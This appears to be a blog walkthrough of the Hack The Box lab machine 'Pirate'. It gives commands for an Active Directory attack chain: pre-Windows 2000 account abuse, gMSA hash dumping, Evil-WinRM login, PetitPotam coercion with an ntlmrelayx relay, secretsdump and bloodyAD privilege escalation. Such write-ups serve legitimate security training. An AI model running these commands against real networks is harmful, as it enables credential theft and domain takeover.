Enter your search text in the box above

Select a result to preview

HTB-Season10-Pirate

#premium

Welcome back my dear hackers! This write-up is a walkthrough for the Pirate machine from HTB. If you are interested, please take a look at my other write-ups. Without any further delay, let's dive in:

Screenshot 2026-05-07 224159 2.png700

Initial Enumeration

Let's start with a classic enumeration using Nmap:

Screenshot 2026-03-01 023414.png700

Open ports:

I hovered around these services but found nothing immediately exploitable. Moving to Active Directory enumeration, I used BloodHound to map out the possible paths for initial access. I discovered there are two Pre-Windows 2000 compatible computer accounts in the Active Directory.

To exploit this and gather more information, I used NetExec (nxc):

nxc ldap pirate.htb -u 'pentest' -p 'p3ntt3st2025!&' -M pre2k

Pasted image 20260508000524.png700

By using this command, we obtain a ticket for the enumerated computer accounts (MS01$, EXCH01$). Using this access, we can dump the Group Managed Service Account (gMSA) passwords. This hands us two highly privileged service accounts (gMSA_ADCS_prod$, gMSA_ADFS_prod1$) along with their NTLM hashes. Voila!

Screenshot 2026-03-01 234203.png700

Initial Foothold & Pivoting

We just found our way in. Using Evil-WinRM and the hash we just dumped, we can get a remote shell as the gMSA_ADFS_prod1$ user:

evil-winrm -i <target_ip> -u 'gMSA_ADFS_prod1` -H '<NTLM-HASH>'

During internal enumeration on this machine, I come across an isolated internal network (IP range: 192.168.100.0/24). To interact with this subnet, I set up a pivot using Ligolo-ng.

Screenshot 2026-03-02 042205.png700

Lateral Movement: PetitPotam (LDAP Relay)

Further enumeration reveals that the Domain Controller is vulnerable to CVE-2021-36942, famously known as PetitPotam. PetitPotam is a critical security vulnerability that allows unauthenticated attackers to trigger an NTLM relay attack. By abusing the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), an attacker can force a Domain Controller (DC) to authenticate against an attacker-controlled server.

First, we set up ntlmrelayx on our Kali machine to catch the coerced authentication and perform an LDAP relay to create a rogue machine account with delegation rights:

impacket-ntlmrelayx -t ldaps://<DC-IP> --delegate-access -smb2support

Screenshot 2026-03-02 224608.png700

Next, we trigger the PetitPotam exploit against the Domain Controller, telling it to authenticate back to our Ligolo tunneled IP:

python3 PetitPotam.py <our-ligolo-IP> <DC-IP>

Screenshot 2026-03-02 222709.png700

In the Server log we can see that we got a creds username: IBWSROCF$ password: hFP-YJru<\f5>mBR. Using these creds we request a kerberos service ticket using impacket-getST.

Using the kerberos ticket we will use impacket-secretsdump to dump the secrets of the domain controller. We can clearly see the user Administrator along with the hash. We will use the administrator user for a complete secret dump where we will find the credentials of the user a.white:E2nvADKSz5Xz2MJu.

Screenshot 2026-03-02 231937.png700

(Don't forget to grab your user flag here!) User Flag:

Pasted image 20260508005513.png700

Privilege Escalation

Previously we used BloodHound, right? So, if we take a look at the permissions of a.white, we can see that he has permission to change the password of the user a.white_adm who has administrative privileges. Using bloodyAD, we will be changing the password.

Screenshot 2026-03-02 233618 1.png700

Using bloodyAD we will update the servicePrincipalName so that we can forge ourselves a kerberos ticket with admin privileges.

Screenshot 2026-03-02 233910 1.png700
Screenshot 2026-03-02 234448 1.png700

Using the ticket and impacket-psexec we will be able to claim our root flag:

Screenshot 2026-03-02 235007.png700

Return to Home